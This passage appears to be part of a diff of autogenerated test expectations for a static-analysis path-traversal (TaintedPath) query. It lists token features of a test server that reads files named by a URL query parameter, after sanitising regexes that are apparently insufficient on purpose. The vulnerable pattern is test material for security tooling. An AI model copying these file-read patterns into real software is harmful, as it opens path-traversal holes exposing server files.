autogenerated/TaintedPath/TaintedPath.js:169:3:169:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:3:169:70 | res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:7:169:11 | write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:7:169:11 | write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:7:169:11 | write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:7:169:11 | write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:7:169:11 | write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:14 | fs | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:14 | fs | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:14 | fs | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:14 | fs | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:14 | fs | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:27 | fs.readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:27 | fs.readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:27 | fs.readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:27 | fs.readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:27 | fs.readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | exceptional return of fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | exceptional return of fs.read ... g, '')) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | exceptional return of fs.read ... g, '')) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | exceptional return of fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | exceptional return of fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | fs.read ... g, '')) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | fs.read ... g, '')) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | fs.read ... g, '')) | contextFunctionInterfaces | views_local(req, res) | @@ -5987,6 +63790,26 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | fs.read ... g, '')) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | fs.read ... g, '')) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:169:13:169:69 | fs.read ... g, '')) | receiverName | res | +| autogenerated/TaintedPath/TaintedPath.js:169:16:169:27 | readFileSync | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:16:169:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:16:169:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:16:169:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:16:169:27 | readFileSync | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:32 | path | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:32 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:32 | path | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:32 | path | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:32 | path | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:40 | path.replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:40 | path.replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:40 | path.replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:40 | path.replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:40 | path.replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | exceptional return of path.re ... /g, '') | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | exceptional return of path.re ... /g, '') | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | exceptional return of path.re ... /g, '') | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | exceptional return of path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | exceptional return of path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | path.re ... /g, '') | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | path.re ... /g, '') | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | path.re ... /g, '') | calleeImports | fs | @@ -5996,6 +63819,11 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | path.re ... /g, '') | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | path.re ... /g, '') | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:169:29:169:68 | path.re ... /g, '') | receiverName | fs | +| autogenerated/TaintedPath/TaintedPath.js:169:34:169:40 | replace | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:34:169:40 | replace | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:169:34:169:40 | replace | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:169:34:169:40 | replace | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:169:34:169:40 | replace | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:169:42:169:63 | /[\\]\\[* ... \\?\\/]/g | CalleeFlexibleAccessPath | path.replace | | autogenerated/TaintedPath/TaintedPath.js:169:42:169:63 | /[\\]\\[* ... \\?\\/]/g | InputArgumentIndex | 0 | | autogenerated/TaintedPath/TaintedPath.js:169:42:169:63 | /[\\]\\[* ... \\?\\/]/g | calleeImports | url | @@ -6014,6 +63842,46 @@ tokenFeatures | autogenerated/TaintedPath/TaintedPath.js:169:66:169:67 | '' | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/TaintedPath.js:169:66:169:67 | '' | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | | autogenerated/TaintedPath/TaintedPath.js:169:66:169:67 | '' | receiverName | path | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:5 | res | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:5 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:5 | res | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:5 | res | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:5 | res | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:11 | res.write | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:11 | res.write | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:11 | res.write | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:11 | res.write | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:11 | res.write | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | exceptional return of res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | exceptional return of res.wri ... , ''))) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | exceptional return of res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g pathModule isAbsolute path res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace /\\./g res write fs readFileSync path replace /\\.\\.\|BLA/g res write fs readFileSync prefix pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.[\\/\\\\])+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)+/ res write fs readFileSync prefix pathModule normalize path replace /(\\.\\.\\/)*/ res write fs readFileSync prefix path replace /^(\\.\\.[\\/\\\\])+/ res write fs readFileSync pathModule normalize path replace /^(\\.\\.[\\/\\\\])+/ | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | exceptional return of res.wri ... , ''))) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | exceptional return of res.wri ... , ''))) | fileImports | ./views child_process express fs http normalize-url parseqs path qs query-string querystring querystringify sanitize-filename send url | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | res.wri ... , ''))) | contextFunctionInterfaces | views_local(req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | res.wri ... , ''))) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/TaintedPath.js:170:3:170:57 | res.wri ... , ''))) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path replace /[\\]\\[*,;'"`<>\\\\?\\/]/g res write fs readFileSync path replace /[abcd]/g res write fs readFileSync path replace /[./]/g res write fs readFileSync path replace /[foobar/foobar]/g res write fs readFileSync path replace /\\//g res write fs readFileSync path replace /\\.\|\\//g res write fs readFileSync path replace /[.]/g res write fs readFileSync path replace /[..]/g res write fs readFileSync path replace 